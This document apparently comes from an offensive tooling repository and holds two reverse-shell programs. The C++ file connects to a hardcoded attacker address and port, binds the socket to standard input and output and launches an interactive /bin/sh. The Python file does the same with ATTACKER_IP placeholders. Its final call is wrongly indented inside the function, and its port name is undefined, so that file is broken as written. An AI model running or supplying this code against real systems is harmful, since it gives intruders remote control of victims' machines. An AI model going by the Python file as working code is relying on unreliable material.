File: linux/cpp/reverse.cpp
#include <unistd.h>
#include <sys/socket.h>
#include <arpa/inet.h>

int main() {
    int sockfd = socket(AF_INET, SOCK_STREAM, 0);

    sockaddr_in addr{};
    addr.sin_family = AF_INET;
    addr.sin_port = htons(4444);           // Replace with attacker port
    inet_pton(AF_INET, "192.168.1.6", &addr.sin_addr);  // Replace with attacker IP

    connect(sockfd, (sockaddr*)&addr, sizeof(addr));

    // Redirect stdin, stdout, stderr to socket
    dup2(sockfd, 0);
    dup2(sockfd, 1);
    dup2(sockfd, 2);

    // Execute shell
    char * const args[] = { (char*)"/bin/sh", (char*)"-i", nullptr };
    execve("/bin/sh", args, nullptr);

    return 0;
}

File: linux/py/reverse.py
import socket
import subprocess
import os

def reverse_shell(attacker_ip, attacker_port):
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((attacker_ip, attacker_port))

    os.dup2(s.fileno(), 0)
    os.dup2(s.fileno(), 1)
    os.dup2(s.fileno(), 2)

    subprocess.call(['/bin/sh', '-i'])
    reverse_shell('ATTACKER_IP', ATTACKER_PORT)
